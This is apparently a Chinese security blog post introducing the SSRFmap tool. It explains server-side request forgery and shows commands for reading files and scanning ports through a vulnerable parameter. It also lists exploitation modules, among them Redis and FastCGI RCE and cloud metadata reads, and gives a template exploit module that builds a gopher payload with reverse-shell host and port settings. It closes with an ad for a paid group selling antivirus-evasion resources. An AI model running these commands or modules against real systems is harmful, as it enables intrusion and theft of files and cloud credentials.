SSRF (Server-Side Request Forgery) 即服务端请求伪造,从字面意思上理解就是伪造一个服务端请求,也即是说攻击者伪造服务端的请求发起攻击,攻击者借由服务端为跳板来攻击目标系统。
利用SSRF可以进行内外网的端口和服务探测、主机本地敏感数据的读取、内外网主机应用程序漏洞的利用等等,可以说SSRF的危害不容小觑了。
SSRFmap,利用它可检测与利用 SSRF 漏洞, 同时它也整合了一些常用漏洞可以结合 SSRF 去利用,比如 fastjson、mysql、github 的一些历史漏洞,还有端口扫描、读取文件等利用功能,都是实用的漏洞利用能力。
实战演示案例
SSRFmap工具的data目录下有一个example.py文件,用来检测框架是否能够正常运行,它这个文件就是用来搭建一个ssrf的漏洞环境
使用抓包软件yakit抓取一个存在ssrf的漏洞数据包
读文件
python ssrfmap.py -r 1.txt -p url -m readfiles
-r:指定数据包
-p:指定漏洞参数
-m:指定检测的模块
扫描端口
python ssrfmap.py -r 1.txt -p url -m portscan
功能模块
SSRFmap已整合了下列功能模块,大家可以使用-m参数来选择使用:
模块名称 | 模块描述 |
fastcgi | FastCGI RCE |
redis | Redis RCE |
github | Github企业版RCE < 2.8.7 |
zabbix | Zabbix RCE |
mysql | MySQL命令执行 |
docker | Docker Infoleaks(API) |
smtp | SMTP邮件发送 |
Portscan | 主机端口扫描 |
networkscan | HTTP Ping sweep |
readfiles | 文件读取,例如/etc/passwd |
alibaba | 从供应商处读取文件 (例如: meta-data, user-data) |
aws | 从供应商处读取文件 (例如: meta-data, user-data) |
gce | 从供应商处读取文件 (例如: meta-data, user-data) |
digitalocean | 从供应商处读取文件 (例如: meta-data, user-data) |
socksproxy | SOCKS4 代理 |
smbhash | 通过UNC Path破解SMB认证 |
tomcat | 爆破Tomcat Manager |
如果各位想针对特定服务添加自己的功能模块,可以参考下面这个模板代码:
from core.utils import *
import logging
name = "servicename inlowercase"
description = "ServiceName RCE - What does itdo"
author = "Name or pseudo of theauthor"
documentation= ["http://link_to_a_research", "http://another_link"]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__(self, requester, args):
logging.info("Module '{}' launched!".format(name))
# Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST= input("Server Host:")
else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT= input("Server Port:")
else: self.SERVER_PORT = args.lport
# Data for the service
# Using a generator to create the hostlist
# Edit the following ip if you need totarget something else
gen_host =gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "6379"
data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
payload = wrapper_gopher(data, ip ,port)
# Handle args for reverse shell
payload = payload.replace("SERVER_HOST",self.SERVER_HOST)
payload =payload.replace("SERVER_PORT", self.SERVER_PORT)
# Send the payload
r =requester.do_request(args.param, payload)
★
欢 迎 加 入 星 球 !
代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员
进成员内部群
星球的最近主题和星球内部工具一些展示
推荐阅读